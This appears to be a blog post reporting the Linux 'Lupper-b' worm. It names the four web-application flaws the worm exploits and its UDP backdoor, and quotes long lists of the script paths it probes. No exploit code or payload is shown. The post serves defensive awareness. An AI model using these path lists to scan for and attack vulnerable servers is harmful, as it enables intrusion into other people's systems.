Linux “Lupper-b” Worm
Recently there have been a number of remotely exploitable vulnerabilities for Linux that have been widely used by remote attackers. I see alot of vulnerability probes on machines directly connected to the Internet, the most common probes are for the Awstats and XML-RPC vulnerbilities.
This week I noticed a variation of these probes that indicated something new was afoot. After a bit of googling on the actual wget request used during the probe I discovered there is a new version of the “Lupper” Linux worm on the loose. “Lupper-b” as it is called, uses a quartet of remotely exploitable vulnerabilities to install itself to host systems.
The four vulnerabilities are found in the Awstats, XML-RPC, Webhints and Includer applications. The worm itself carries a proxy server and backdoor shell on UDP port 7222, I have also seen mention of an IRC bot included in some cases.
Interestingly enough, while googling the attack string looking for information I actually googled up a vulnerable server or two (or 50, who’s counting?). All in all it’s a fairly slick worm in that it has a combined exploit capacity and a UDP back door shell.
The paths to vulnerable applications are as follows:
“Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats.pl script at the following locations:
/cgi-bin/awstats.pl
/scgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi-bin/stats/awstats.pl
/scgi-bin/stats/awstats.pl
/stats/awstats.pl
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
Trying to exploit the Webhints vulnerability, the worm attempts to submit its commands to the following scripts:
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgi
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi
Trying to exploit the Includer vulnerability, the worm attempts to submit its commands to the following scripts:
/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi”
A full writeup on the worm is available from Computer Associates, be sure to follow the links on the specific vulnerabilities so you get the full gist of the attack vector.
